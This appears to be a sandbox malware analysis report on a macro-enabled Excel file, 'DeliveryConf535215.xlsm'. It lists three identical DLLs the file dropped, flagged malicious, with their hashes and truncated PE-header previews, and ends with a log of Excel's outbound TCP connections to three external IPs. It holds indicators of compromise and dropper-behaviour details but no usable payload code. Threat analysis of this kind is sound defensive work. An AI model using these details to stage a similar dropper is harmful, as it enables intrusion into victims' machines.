                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A04F74AC.png
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):174009
                                                                                                                                                                                              Entropy (8bit):7.967231122944825
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
                                                                                                                                                                                              MD5:C0AF15BAE70AFFC4BE7625110AEEF09A
                                                                                                                                                                                              SHA1:AEF94E038F0538C812AAF9EF605F76AF2376A26D
                                                                                                                                                                                              SHA-256:D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
                                                                                                                                                                                              SHA-512:131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: .PNG........IHDR...@...@.......~.....PLTE.....3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................(....tRNS...................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\Desktop\~$DeliveryConf535215.xlsm
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):165
                                                                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              C:\Users\user\XRAY.dll
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\XTOWN.dll
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\XZIBIT.dll
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                                                                              Entropy (8bit):7.939405965884755
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                                                              • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                                                              File name:DeliveryConf535215.xlsm
                                                                                                                                                                                              File size:189905
                                                                                                                                                                                              MD5:dcd1fa0b71a3bb9c11cf0899a6b3addb
                                                                                                                                                                                              SHA1:894e9de6e6aa9796236523697905baf0a6c7282d
                                                                                                                                                                                              SHA256:50d9eefeb3f4c066d06dfc84c1f4d2576f1544eeb85d2c9940f6b0932a77dcde
                                                                                                                                                                                              SHA512:fb8a4b23ef30d55ca935ce5ebe4955771a58b8c0cb77f19fc8574f793e331de25ece88e90bf5e76403af09562281cdfbe5b2e9e61eaea66bba84879f43c7a34d
                                                                                                                                                                                              SSDEEP:3072:0DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/Xvpk:eRcGUlFzy4mpTHdrUc3/SsYASx
                                                                                                                                                                                              File Content Preview:PK..........!....7............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:e4e2aa8aa4bcbcac

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Jul 6, 2021 15:07:24.350395918 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.388701916 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.388827085 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.390232086 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.428394079 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450352907 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450381994 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450397968 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450412989 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450428963 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450444937 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450463057 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450479984 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450495005 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450509071 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450542927 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450623989 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450630903 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.451026917 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.451046944 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.451142073 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.451195955 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.451970100 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.451996088 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.452092886 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.452861071 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.452877998 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.452985048 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.453883886 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.453905106 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.453974962 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.454818010 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.454848051 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.454917908 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.455553055 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.455579996 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.455626965 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.456478119 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.456496000 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.456551075 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.457375050 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.457391024 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.457451105 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.458539963 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.458611012 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.458865881 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.458930016 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.459068060 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.459192038 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.459240913 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.459304094 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.470655918 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.488940001 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.489047050 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.489063978 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.489125967 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.489216089 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.489279985 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.489299059 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.489367962 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.490077019 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.490115881 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.490170002 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.490186930 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.490957975 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.491019011 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.491045952 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.491077900 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.491760015 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.491811991 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.491832018 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.491848946 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.492794991 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.492851019 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.492866039 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.492888927 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.493549109 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.493602037 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.493607044 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.493649006 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:07:24.578651905 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.619982958 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.620122910 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.621185064 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.664242983 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.718043089 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.718106031 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.718131065 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.718240976 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.718270063 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731333017 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731364012 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731378078 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731391907 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731429100 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731436014 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731463909 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731489897 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731498003 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731506109 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731523991 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731558084 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731580973 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731594086 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731611013 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731635094 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731664896 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731673956 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731692076 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731712103 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731729031 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731750965 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731777906 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731791973 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731815100 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731837988 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731838942 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731851101 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731854916 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731859922 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731873035 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731885910 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731894016 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731909037 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731925011 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731930971 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731937885 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731952906 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731966019 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.731988907 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.732356071 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.732980013 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.734570026 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.734617949 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.736334085 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.737761021 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.739198923 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.739224911 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.739253998 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.739258051 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.739260912 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.739263058 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.739264965 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.739268064 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.764951944 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.766431093 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.768826008 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.768850088 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.768889904 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.768918991 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.768939972 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.768963099 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.768965006 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.768985987 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.769023895 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.775923014 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.775960922 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.775978088 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.775995016 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.776010990 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.776027918 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.776045084 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.776067019 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.782855034 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.782911062 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:07:24.857253075 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:24.896080971 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.896245003 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:24.897356033 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:24.936824083 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997143984 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997181892 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997205019 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997226000 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997247934 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997272015 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997296095 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997328997 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997350931 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997374058 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997467995 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997621059 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:24.997982025 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.998033047 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:24.998322964 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.998387098 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:07:24.998960018 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.999063969 CEST4916980192.168.2.22104.21.55.83
